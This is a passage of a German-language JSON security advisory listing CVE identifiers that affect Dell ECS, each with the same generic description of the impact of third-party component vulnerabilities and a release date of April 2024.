"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-0054"
},
{
"cve": "CVE-2023-0215",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-0215"
},
{
"cve": "CVE-2023-0286",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-0286"
},
{
"cve": "CVE-2023-0288",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-0288"
},
{
"cve": "CVE-2023-0433",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-0433"
},
{
"cve": "CVE-2023-0464",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-0464"
},
{
"cve": "CVE-2023-0465",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-0465"
},
{
"cve": "CVE-2023-0466",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-0466"
},
{
"cve": "CVE-2023-0512",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-0512"
},
{
"cve": "CVE-2023-0590",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-0590"
},
{
"cve": "CVE-2023-0597",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-0597"
},
{
"cve": "CVE-2023-0833",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-0833"
},
{
"cve": "CVE-2023-1076",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-1076"
},
{
"cve": "CVE-2023-1095",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-1095"
},
{
"cve": "CVE-2023-1118",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-1118"
},
{
"cve": "CVE-2023-1127",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-1127"
},
{
"cve": "CVE-2023-1170",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-1170"
},
{
"cve": "CVE-2023-1175",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-1175"
},
{
"cve": "CVE-2023-1370",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-1370"
},
{
"cve": "CVE-2023-1380",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-1380"
},
{
"cve": "CVE-2023-1390",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-1390"
},
{
"cve": "CVE-2023-1436",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-1436"
},
{
"cve": "CVE-2023-1513",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-1513"
},
{
"cve": "CVE-2023-1611",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-1611"
},
{
"cve": "CVE-2023-1670",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-1670"
},
{
"cve": "CVE-2023-1855",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-1855"
},
{
"cve": "CVE-2023-1989",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-1989"
},
{
"cve": "CVE-2023-1990",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-1990"
},
{
"cve": "CVE-2023-1998",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-1998"
},
{
"cve": "CVE-2023-20862",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-20862"
},
{
"cve": "CVE-2023-2124",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-2124"
},
{
"cve": "CVE-2023-2162",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-2162"
},
{
"cve": "CVE-2023-2176",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-2176"
},
{
"cve": "CVE-2023-21830",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-21830"
},
{
"cve": "CVE-2023-21835",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-21835"
},
{
"cve": "CVE-2023-21843",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-21843"
},
{
"cve": "CVE-2023-21930",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-21930"
},
{
"cve": "CVE-2023-21937",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-21937"
},
{
"cve": "CVE-2023-21938",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-21938"
},
{
"cve": "CVE-2023-21939",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-21939"
},
{
"cve": "CVE-2023-2194",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-2194"
},
{
"cve": "CVE-2023-21954",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-21954"
},
{
"cve": "CVE-2023-21967",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-21967"
},
{
"cve": "CVE-2023-21968",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-21968"
},
{
"cve": "CVE-2023-22490",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-22490"
},
{
"cve": "CVE-2023-2253",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
